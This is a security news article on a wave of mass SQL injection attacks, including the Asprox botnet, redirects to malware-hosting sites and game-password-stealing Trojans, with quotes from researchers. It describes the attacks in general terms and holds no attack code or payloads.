New wave of SQL injection attacks alarm researchers

Researchers are uncovering a wave of SQL injection attacks, suggesting that attackers are finding it easy to compromise new targets.

Attackers looking for a quick and easy way to compromise a large number of machines increasingly are relying on an old standby that has come back into favor: SQL injection.

These guys used to just be interested in what they could get from one site. Now, the sites are platforms to steal data and launch other attacks.
Billy Hoffman,
lead security researcherWeb Security Research Group at HP

In recent months security researchers have uncovered a startling number of websites that have been compromised by a series of mass SQL injection attacks that take advantage of weak Web applications and then use those sites as a platform to infect visitors' PCs with malware. The trend is a worrisome one for a number of reasons, researchers say, but the biggest concern is the enormous number of sites on the Web that are vulnerable to this kind of attack and the ease with which attackers are able to find and compromise new targets.

Even relatively basic websites can have several applications running at any one time and all it takes is a small coding error in one of those programs and an attacker has the opening he needs.

"It doesn't take a lot of effort," said Billy Hoffman, lead security researcher for the Web Security Research Group at HP, and an expert on Web application security. "There are so many Web-facing applications out there and a lot of them were written years ago and didn't go through any kind of code review."

Billy Hoffman
Billy Hoffman

The new wave of SQL injection attacks seems to have started earlier this year and has continued unabated since, with researchers continually finding more and more domains that have one or more compromised sites on them. The attacks can take one of several different forms, but the common denominator is their attempts to inject malicious SQL statements into otherwise legitimate Web pages. This will trigger an error on the database running the application on the back end, allowing the attacker to insert his own code. Many of the attacks are automated, using various toolkits to speed up the exploitation process, experts say.

One such toolkit discovered recently is the Asprox Trojan, which researchers have observed being distributed by a spam botnet in recent weeks. Joe Stewart, senior security researcher with SecureWorks, based in Atlanta, did an analysis of the Asprox Trojan , which is related to a password-stealing Trojan known as Danmec. Once the malware has infected a PC, it will download a binary that, when launched, searches Google for websites that contain specific terms. It will then launch a SQL injection attack against those sites. The result is that visitors to the site will then be forced to download a piece of malicious JavaScript code from another site. That code directs the user to a third site, where more malware is hosted, likely copies of Asprox or Danmec, Stewart says.

"The Asprox code is very similar to what is being injected by the Chinese domains that are installing the game password-stealing Trojans," Stewart said. "I don't know if they bought a copy of it from the Chinese or if it's just a copycat, but they've been successful to a certain extent. It looks like someone has taken that code and put it into a massive program to spread it as far and wide as possible."

SQL injection attacks:
SQL injection attack infects hundreds of thousands of websites: Security experts are watching massive numbers of automated SQL injection attacks from Chinese domains. Attackers use simple search engine queries to build a list of targets.

Preventing blind SQL injection attacks: Most security professionals know what SQL injection attacks are and how to protect their Web applications against them.

Is your site vulnerable to SQL injection attacks? SQL injection exploits could be as common as those targeting Windows and Unix flaws, experts say.

"What's driving the attacks for the time being are copycats and the overall availability of scanning and injecting tools, which in combination with hundreds of thousands of sites with outdated web applications in place, results is the current situation - over 1.5 million pages affected," said Dancho Danchev, an independent security consultant and researcher who has been following the SQL injection attacks. "Next to the lone copycats are the botnet masters with the Asprox botnet, and its ongoing efforts to participate in the attack. Moreover, the injected malicious domains are being put in a fast-flux, namely they respond to ten different IPs of malware-infected hosts [that are] part of the network, and the IPs themselves change constantly. The current attacks can be easily described as the long tail of SQL injection attacks reaching to the far corner of the Web. They simply do some reconnaissance then exploit the vulnerable targets."

Researchers say it's virtually impossible to know how many sites have been compromised in this way, though Stewart estimates that the Asprox malware has infected about 35,000 sites so far, based on Google searches. But what is clear is that where once attackers were content just to break into one site's database and root around for interesting nuggets, now they're highly focused on owning as many PCs as possible and using those machines as platforms for other activities.

"What we're seeing is Web threats evolving just like desktop threats," said Hoffman. "These guys used to just be interested in what they could get from one site. Now, the sites are platforms to steal data and launch other attacks. They're realizing they can use those machines as resources. Why just own the machine when I can use it to install malware and jump off to other machines?"

Much of the recent SQL injection activity appears to be coming from China and researchers around the world have been tracking the sources of the attacks. The Shadowserver Foundation has published a list of all of the domains that are injecting malicious code into other sites , and a large number of them are Chinese domains, with many of the others being .com or .info addresses.

SQL injection has come back into vogue with attackers for a number of reason, particularly the ease with which it can be automated. But it's also a maddeningly simple attack to execute, with a broad range of potential targets, making it appealing to both the low-level script kiddy as well as the pro who is looking for a big score.

"There's no commonality among these sites. They're just sites that have a programming mistake on them and these guys have picked the broadest attack surface possible, and that's where the SQL injection comes in," Stewart said. "They don't even have to do any work to find targets. All they do is go to Google and search for Active Server Pages that have a certain term on them. They know that ASP pages will be running MS SQL on the back end, and so then they just look for a specific argument in those pages and they're done."

The Chinese SQL injection attacks that began in March and are still carrying on are designed mainly to install Trojans that steal passwords to online games such as World of Warcraft. But, as Stewart points out, it's a short hop from stealing game passwords to swiping online banking passwords.

"It wouldn't take much effort at all. The thing that may stop them is that is a pretty serious crime in China. They've executed people for that," Stewart says. "So it could be that right now people aren't willing to take the risk."

Dig deeper on Application Attacks (Buffer Overflows, Cross-Site Scripting)

Pro+

Features

Enjoy the benefits of Pro+ membership, learn more and join.

0 comments

Oldest 

Forgot Password?

No problem! Submit your e-mail address below. We'll send you an email containing your password.

Your password has been sent to:

-ADS BY GOOGLE

SearchCloudSecurity

SearchNetworking

SearchCIO

SearchConsumerization

SearchEnterpriseDesktop

SearchCloudComputing

ComputerWeekly

Close